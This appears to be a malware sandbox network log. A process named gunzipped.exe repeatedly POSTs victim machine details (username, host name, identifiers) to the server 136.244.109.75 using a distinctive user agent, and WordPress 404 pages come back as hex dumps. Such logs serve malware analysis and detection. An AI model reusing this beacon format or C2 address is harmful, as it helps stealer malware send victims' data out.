                          Apr 17, 2024 03:18:12.751965046 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:12.752003908 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:12.752043009 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:12.752079964 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:12.752156019 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          53192.168.2.549767136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:13.442137957 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:13.653587103 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:14.572911024 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:13 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:14.573026896 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:14.573067904 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:14.573106050 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:14.573148966 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:14.573187113 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:14.573226929 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:14.573266029 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:14.573302984 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:14.573348045 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          54192.168.2.549768136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:14.912121058 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:15.116725922 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:16.038089991 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:14 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:16.038153887 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:16.038192034 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:16.038228035 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:16.038270950 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:16.038310051 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:16.038347960 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:16.038386106 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:16.038424969 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
